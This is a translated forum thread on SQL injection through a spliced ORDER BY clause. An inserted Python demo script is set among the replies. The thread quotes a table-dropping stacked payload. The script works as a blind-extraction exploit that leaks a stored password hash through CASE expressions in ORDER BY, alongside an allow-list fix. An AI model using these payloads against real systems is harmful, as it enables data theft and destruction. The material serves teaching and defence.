
mysql - Could this SQL be injected?

SELECT * FROM table1 where condition1=1 ORDER BY $sortField$ $sortOrder$ limit 0,20

$sortField$ and $sortOrder$ can be set to arbitrary SQL.

Is there an injection risk in this SQL?

迷茫迷茫 · 2742 days ago · 622

3 replies

  • ringa_lee  2017-04-17 15:06:00

    As long as you splice variables directly into the SQL statement, there is a risk of injection.

    SELECT * FROM table1 where condition1=1 ORDER BY $sortField$ $sortOrder$ limit 0,20

    sortField="id"
    sortOrder="; drop table users; --"

    Your SQL will become:

    SELECT * FROM table1 where condition1=1 ORDER BY id; drop table users; -- limit 0,20

  • 天蓬老师  2017-04-17 15:06:00

    You are thinking about the problem in the wrong direction.

    The correct way to prevent injection is to use the parameterized mode of the official driver, because only the official driver knows how to avoid injection.

    If you assemble the SQL yourself, even if it cannot be injected now, there may be an injection risk later if one of the components in that chain changes.

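The two replies above make different points: the first shows a stacked-statement payload (`; drop table users; --`), the second says to rely on the driver's parameterized mode. The added example below, which is not from the thread or any of its posters, shows both sides in one runnable script: the question's query built by string splicing leaks data through ORDER BY alone, without any stacked statement, and the hardened version shows why parameter binding is not enough on its own for this clause. It uses Python's built-in sqlite3 as a stand-in for MySQL (assumed, so it runs offline; the CASE-in-ORDER-BY technique and `LIMIT offset, count` syntax are the same on MySQL), a constructed `table1` and a constructed `users` row, and an assumed allow-list of sortable columns.

```python
import sqlite3

HEX = "0123456789abcdef"


def make_db():
    """Constructed sample data standing in for the question's table1, plus a users
    table an attacker would want to read. sqlite3 replaces MySQL here (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE table1 (id INTEGER PRIMARY KEY, name TEXT, condition1 INTEGER);
        INSERT INTO table1 VALUES (1, 'zulu', 1), (2, 'alpha', 1), (3, 'mike', 1);
        CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def query_vulnerable(conn, sort_field, sort_order):
    """Builds the query exactly as the question does: both sort parameters are
    spliced into the SQL text. Returns the ids in the order the database gave them."""
    sql = (f"SELECT * FROM table1 WHERE condition1=1 "
           f"ORDER BY {sort_field} {sort_order} LIMIT 0,20")
    return [row[0] for row in conn.execute(sql)]


def stacked_statement_refused(conn):
    """The '; drop table users; --' payload from the first reply only works when the
    driver runs several statements per call. Python's sqlite3 execute() refuses a
    second statement, so the payload fails here; the ORDER BY leak below does not."""
    try:
        query_vulnerable(conn, "id", "; drop table users; --")
    except (sqlite3.Error, sqlite3.Warning):
        return True
    return False


def leak_hash_prefix(conn, length):
    """Blind extraction through ORDER BY alone: a CASE expression sorts by id when the
    guessed character is right and by name when it is wrong, so the row order is a
    one-bit oracle. No stacked statement, UNION or error message is needed."""
    recovered = ""
    for pos in range(1, length + 1):
        for guess in HEX:
            payload = (f"(CASE WHEN (SELECT substr(password_hash,{pos},1) FROM users "
                       f"WHERE login='admin')='{guess}' THEN id ELSE name END)")
            if query_vulnerable(conn, payload, "ASC") == [1, 2, 3]:  # id order: guess is right
                recovered += guess
                break
        else:
            raise RuntimeError("no character matched")
    return recovered


# Assumed allow-lists: the value the client may send -> the identifier actually used.
SORT_FIELDS = {"id": "id", "name": "name"}
SORT_ORDERS = {"asc": "ASC", "desc": "DESC"}


def query_safe(conn, sort_field, sort_order, page_size=20):
    """Hardened form. Column names and ASC/DESC are identifiers and keywords, not data,
    so they cannot be bound as parameters (binding 'name' sorts by the constant string
    'name'). They are mapped through the allow-list instead; only the LIMIT values,
    which are data, are bound."""
    column = SORT_FIELDS.get(str(sort_field).lower())
    direction = SORT_ORDERS.get(str(sort_order).lower())
    if column is None or direction is None:
        raise ValueError("unsupported sort parameter")
    sql = (f"SELECT * FROM table1 WHERE condition1=1 "
           f"ORDER BY {column} {direction} LIMIT ?, ?")
    return [row[0] for row in conn.execute(sql, (0, page_size))]


if __name__ == "__main__":
    db = make_db()
    print(query_vulnerable(db, "name", "DESC"))   # [1, 3, 2]
    print(stacked_statement_refused(db))          # True
    print(leak_hash_prefix(db, 4))                # 5f4d
    print(query_safe(db, "name", "desc"))         # [1, 3, 2]
    try:
        query_safe(db, "(CASE WHEN 1=1 THEN id ELSE name END)", "asc")
    except ValueError as exc:
        print("rejected:", exc)
```

`leak_hash_prefix` recovers one hex character of the stored hash per at most sixteen requests, which is what a tool such as sqlmap automates once it finds the ORDER BY parameter injectable. Note that `query_safe` never passes client input into the SQL text at all: the client sends a key, the server picks the identifier. Whether the `$...$` placeholders in the question are substituted literally or bound is a property of the framework or driver in use; the allow-list approach is correct either way, because no driver can bind an ORDER BY column name.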
  • 怪我咯  2017-04-17 15:06:00

    You can test it directly with sqlmap; its engine is very powerful.
